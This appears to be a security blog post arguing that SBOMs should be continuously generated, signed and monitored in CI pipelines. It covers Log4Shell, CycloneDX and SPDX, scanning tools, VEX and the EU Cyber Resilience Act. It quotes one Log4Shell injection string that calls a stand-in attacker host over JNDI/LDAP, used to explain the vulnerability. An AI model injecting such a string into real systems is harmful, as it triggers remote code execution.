The question is simple: what software is actually running in your systems? Not what you think is running, not what the deployment manifest says, but what is really there, compiled, linked, packaged, and shipped. For most organizations, the honest answer remains that they are not entirely sure.

That gap between what teams believe they’re shipping and what is actually inside a software artifact is where attackers have been living for years. SolarWinds turned it into a geopolitical incident. Log4Shell turned it into a week of emergency all-hands meetings for a large part of the industry. Yet even after those events, many teams still cannot produce a reliable, complete, up-to-date inventory of their software components on demand.

The SBOM (Software Bill of Materials) exists to answer that question. Treated only as a compliance artifact, however, it delivers a fraction of its real value.

The lesson nobody really learned from Log4Shell

When CVE-2021-44228 dropped on December 9, 2021, with a CVSS score of 10.0, the response across the industry was instant panic followed by exhausting confusion. Not because the vulnerability was hard to understand (an attacker could trigger remote code execution by injecting a crafted string, along the lines of ${jndi:ldap://attacker.example/a}, that Log4j2 would blindly evaluate via a JNDI lookup), but because nobody knew where Log4j2 was hiding.

It was everywhere. It was inside Elasticsearch, Logstash, Kafka, VMware products, Cisco software, Fortinet, dozens of SaaS platforms. It was not in the first layer of dependencies that developers think about, but in the transitive dependencies: the libraries that your libraries pull in, which in turn pull in other libraries, until the graph extends to hundreds of nodes for a medium-sized application. Organizations that had no inventory spent weeks running queries, asking vendors uncomfortable questions, and improvising. Organizations with good tooling and automated inventory answered within hours.

The Log4Shell response became, effectively, a live benchmark for software supply chain maturity. Those who passed it had invested in visibility. Those who failed were still operating on trust and assumption.

That is the real reason SBOM matters, not because a regulation says so, but because the next Log4Shell is coming and the window between disclosure and active exploitation keeps shrinking.

What an SBOM actually is (and what it is not)

An SBOM is a machine-readable inventory of the components that make up a software artifact. Every library, every module, every dependency pulled from a package registry or embedded at build time: each one represented with enough metadata to identify it precisely and correlate it against vulnerability databases and license records. The NTIA minimum elements, defined in 2021 as part of the implementation of Executive Order 14028, set the baseline: supplier name, component name, version, a unique identifier such as a Package URL or CPE, the dependency relationship, the SBOM author, and a timestamp.
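As a rough illustration, the NTIA minimum elements map onto a CycloneDX document roughly as follows. Field names follow the CycloneDX JSON schema; the component values and bom-refs are hypothetical, and a real SBOM would carry many more components:

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "metadata": {
    "timestamp": "2025-01-15T10:00:00Z",
    "authors": [{ "name": "CI Build Pipeline" }]
  },
  "components": [
    {
      "bom-ref": "log4j-core-ref",
      "type": "library",
      "supplier": { "name": "The Apache Software Foundation" },
      "name": "log4j-core",
      "version": "2.17.1",
      "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"
    }
  ],
  "dependencies": [
    { "ref": "app-ref", "dependsOn": ["log4j-core-ref"] }
  ]
}
```

Supplier, name, version, unique identifier (the purl), dependency relationship, author, and timestamp: all seven minimum elements are present in a few lines of structured data.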

What an SBOM is not is a pom.xml or a requirements.txt. Those files declare the dependencies a developer intended to include at the time they wrote the manifest. The actual compiled binary or container image often tells a different story, especially when build tools resolve version ranges, when indirect dependencies get bundled, or when base images carry components the application team never explicitly chose. A proper SBOM is generated from the artifact itself, not from the source declaration, and that distinction changes both the tooling and the workflow required to produce it.
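A toy sketch of that gap, with hypothetical package names and versions (this is not a real resolver, just an illustration of why the manifest and the artifact disagree):

```python
# Toy illustration: the manifest declares intent, the artifact records reality.
# All package names and versions here are hypothetical.

declared = {                        # what a requirements.txt-style manifest says
    "webframework": ">=2.0,<3.0",   # a version range, not a pin
    "httpclient": "==1.4.2",
}

resolved = {                        # what an artifact-level SBOM scan would find
    "webframework": "2.7.1",        # the resolver picked a concrete version
    "httpclient": "1.4.2",
    "urlparser": "0.9.0",           # transitive dependency, never declared
    "zlib-bindings": "1.1.0",       # carried in by the base image
}

# Components present in the artifact but absent from the manifest are
# exactly what a manifest-derived "SBOM" would miss.
undeclared = sorted(set(resolved) - set(declared))
print(undeclared)  # ['urlparser', 'zlib-bindings']
```

The two undeclared entries are the interesting ones: they are invisible to any process that only reads the manifest, and they are precisely where a Log4Shell-style surprise tends to live.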

It also is not a snapshot you generate once for a compliance audit. A component that was clean at release may develop a critical vulnerability six months later. If the SBOM lives in a folder somewhere and nobody is watching it against updated intelligence, it provides the same operational value as a smoke detector with a dead battery.

Two formats, one pragmatic choice

The two dominant SBOM formats today are SPDX, maintained by the Linux Foundation and standardized as ISO/IEC 5962:2021, and CycloneDX, developed by OWASP. Both are recognized by NTIA. Both cover the minimum required fields. The practical difference lies in focus.

SPDX has deeper roots in license compliance and open source governance. Its version 3.0, released in April 2024, extends the model beyond software to cover hardware, AI components, and build systems. CycloneDX is designed for security workflows: it has native support for VEX, Vulnerability Exploitability eXchange, which lets producers tell consumers not just what components are present but whether a given vulnerability is actually exploitable in a specific deployment context.

In most DevSecOps pipelines today, CycloneDX tends to be the more natural choice when the goal is vulnerability management integration. SPDX tends to be preferred when open source license compliance is the primary concern, or when a procurement or certification process requires the ISO standard explicitly. For organizations that need both, the good news is that the tooling can usually produce either format from the same analysis.

The toolchain that actually works

The open source ecosystem around SBOM generation has matured significantly since the Log4Shell moment. Syft, by Anchore, is one of the most widely used generators: it works across container images, filesystems, and OCI artifacts, covering a broad range of language ecosystems from Java and JavaScript to Go, Rust, and .NET. It integrates naturally with Grype, the Anchore vulnerability scanner, which consumes SBOM output and correlates it against sources including the NVD, GitHub Security Advisories, and distribution security notices.
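Conceptually, the correlation step a scanner like Grype performs is simple: match each component identifier in the SBOM against an advisory feed. A minimal sketch with hypothetical feed data (a real scanner handles version ranges, identifier aliases, and many feeds at once):

```python
# Minimal sketch of SBOM-to-advisory correlation. The advisory feed here is a
# toy dict; real scanners match Package URLs against version ranges from NVD,
# GitHub Security Advisories, distro notices, and more.

sbom_components = [
    {"purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
    {"purl": "pkg:npm/lodash@4.17.21"},
]

advisories = {
    # keyed by (package, exact vulnerable version) -- a deliberate simplification
    ("pkg:maven/org.apache.logging.log4j/log4j-core", "2.14.1"): "CVE-2021-44228",
}

def correlate(components, feed):
    findings = []
    for comp in components:
        pkg, _, version = comp["purl"].rpartition("@")
        cve = feed.get((pkg, version))
        if cve:
            findings.append((comp["purl"], cve))
    return findings

print(correlate(sbom_components, advisories))
```

The value of the purl as the join key is that both sides of the correlation, generator and feed, can agree on it without ambiguity.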

Trivy, by Aqua Security, takes a broader approach: it is a combined vulnerability scanner and SBOM generator that handles container images, Git repositories, Kubernetes workloads, and Infrastructure as Code files, making it a convenient single tool for teams that want coverage across the stack. cdxgen, the official CycloneDX generator from OWASP, stands out for the depth of its analysis in Java and JavaScript ecosystems and for its ability to work from source code without requiring a compiled artifact.

For enterprise build environments, the Microsoft SBOM Tool offers integration with heterogeneous build systems and Azure DevOps pipelines; it generates SPDX output, so teams standardizing on CycloneDX will need a conversion step or a different generator.

No tool solves the problem alone. Output quality depends on how well the tool understands the build system, how the artifact is packaged, and how the analysis is configured. Firmware and embedded systems remain genuinely hard: tools like Binwalk can extract and analyze firmware images, but the results still require manual validation and domain expertise that most application security teams do not have.

The CI/CD integration question is the real question

Generating an SBOM once is trivial. The harder engineering problem is keeping it accurate over time, tied to every release, and actually consumed by something that can act on it.

A production workflow worth the name generates the SBOM automatically at build time, from the compiled artifact, signs it cryptographically with Sigstore/Cosign so its integrity can be verified later, and stores it versioned alongside the release artifact. In container environments, the SBOM can be attached directly to the OCI image as a signed attestation, using the in-toto attestation format that frameworks such as SLSA build on, which is a clean approach because the inventory travels with the artifact wherever it goes.
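Sketched as CI steps, that build-time piece can look roughly like the following. The image name and registry are placeholders, and exact flags should be verified against the installed syft and cosign versions:

```yaml
# Sketch of build-time SBOM generation and attestation (GitHub Actions style).
# registry.example.com/app is a placeholder image reference.
- name: Generate SBOM from the built image
  run: |
    syft registry.example.com/app:${{ github.sha }} \
      -o cyclonedx-json > sbom.cdx.json

- name: Sign and attach the SBOM as an attestation
  run: |
    cosign attest --yes \
      --predicate sbom.cdx.json \
      --type cyclonedx \
      registry.example.com/app:${{ github.sha }}
```

Because the attestation is stored next to the image in the registry, any downstream consumer that can pull the image can also retrieve and verify its inventory.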

The continuous monitoring piece is where most implementations fall short. New vulnerabilities appear after release, not before, and a static SBOM that nobody is watching against updated databases provides no operational value. Dependency-Track, the OWASP project for continuous SBOM management, solves this reasonably well: it ingests SBOM files via API, keeps them correlated against multiple vulnerability sources, and generates alerts when newly published CVEs match components already in inventory. Connecting those alerts to a ticketing system transforms the SBOM from a document into an operational feed.
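Dependency-Track ingests BOMs as base64-encoded payloads over its REST API. A sketch of building that upload payload (the project UUID and SBOM content are placeholders, and the actual HTTP call with its X-Api-Key header is omitted):

```python
import base64
import json

# Build the upload payload for Dependency-Track's BOM ingestion endpoint
# (PUT /api/v1/bom). Project UUID and SBOM content below are placeholders;
# the HTTP request itself, authenticated via an X-Api-Key header, is omitted.

sbom_bytes = json.dumps(
    {"bomFormat": "CycloneDX", "specVersion": "1.5", "components": []}
).encode()

payload = {
    "project": "00000000-0000-0000-0000-000000000000",  # placeholder UUID
    "bom": base64.b64encode(sbom_bytes).decode("ascii"),
}

# Sanity check: the server will decode exactly the bytes we encoded.
assert base64.b64decode(payload["bom"]) == sbom_bytes
print("payload keys:", sorted(payload))
```

Once ingestion is automated per release, the alerting side (newly published CVEs matching components already in inventory) comes essentially for free from the platform.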

The VEX workflow closes the loop. In any real environment, a significant fraction of the vulnerabilities that scanners flag are not exploitable given the specific deployment context: the vulnerable code path is not reachable, the affected feature is disabled, or there is a compensating control in place. VEX documents let the producing team communicate this context to downstream consumers, reducing noise and letting response efforts concentrate on what is actually dangerous. CISA has been pushing VEX adoption as a complementary mechanism to SBOM, and CycloneDX supports it natively.
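In CycloneDX, a VEX statement is expressed through the vulnerabilities array and its analysis block. A hypothetical fragment (the affects ref is a placeholder; state and justification values come from the CycloneDX enumerations):

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "vulnerabilities": [
    {
      "id": "CVE-2021-44228",
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "detail": "The JNDI lookup feature is disabled in this deployment."
      },
      "affects": [
        { "ref": "log4j-core-ref" }
      ]
    }
  ]
}
```

A consumer that trusts this statement can suppress the finding for this artifact while keeping it active everywhere the same component appears without the compensating context.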

The regulatory push and why it is not entirely the enemy

The Cyber Resilience Act, published in the Official Journal of the EU on November 20, 2024 as Regulation 2024/2847, makes SBOM a documented requirement for products with digital elements sold on the European market. Vulnerability notification obligations apply from September 2026, full compliance from December 2027. The regulation requires manufacturers to document components and vulnerabilities in a machine-readable format covering at least first-level dependencies, and to make that documentation available to market surveillance authorities on request.

The nuance worth noting: the CRA does not require public disclosure of the SBOM, only availability to regulators. That matters for manufacturers with legitimate confidentiality concerns about exposing their full software stack to competitors, and it means the SBOM retains its operational value internally even if it is never published.

NIS2 and DORA reinforce the picture from different angles: NIS2 requires essential and important entities to manage supply chain software risk, while DORA imposes specific controls on technology dependencies for financial institutions. For organizations building software for multiple regulated markets, the SBOM is becoming a baseline deliverable, not a discretionary activity.

This regulatory pressure should be read as validation for investments that were overdue. As I noted in a recent post on vulnerability management, most security programs do not fail for lack of tools but for lack of context. Patch volumes are enormous, scanner output is noisy, and teams too often optimize for metrics that look good on a dashboard instead of for actual resilience. A well-maintained SBOM provides the missing context layer: it connects a vulnerability report to a specific artifact, a specific release, a specific deployment and the team responsible for the decision.

What the compliance-first approach gets wrong

The failure mode to avoid is treating SBOM generation as a documentation exercise. An SBOM that is generated manually by the security team before a product release, dropped into a shared folder, and never touched again is almost worse than no SBOM, because it creates a false sense of coverage.

The same logic applies to vendor-provided SBOMs. As supply chain obligations cascade downstream, more organizations will start requesting SBOMs from their software suppliers. Receiving a CycloneDX file from a vendor is only useful if you have a process to ingest it, validate its quality, monitor it against current vulnerability intelligence, and track its updates across releases. Otherwise it is just another document in a compliance archive.

The operational maturity question is not “do we have an SBOM?” It is “do we know, right now, which deployed artifacts contain a component that appeared in yesterday’s CVE feed?” If the answer requires manual work, the pipeline is not finished yet.

As I wrote before in the context of container image security, the supply chain threat is not theoretical. Attackers are actively targeting the build and distribution layer, and the organizations that get hit hardest are those that inherited implicit trust in their software stack without ever verifying it. An SBOM program, built into the CI/CD pipeline and monitored continuously, is one of the most direct investments in making that implicit trust explicit and verifiable.

The regulation is pushing in the right direction. The tooling is mature enough to get started. The remaining question is whether security teams will use the compliance deadline as a forcing function to build something actually useful, or just generate enough documentation to satisfy an audit.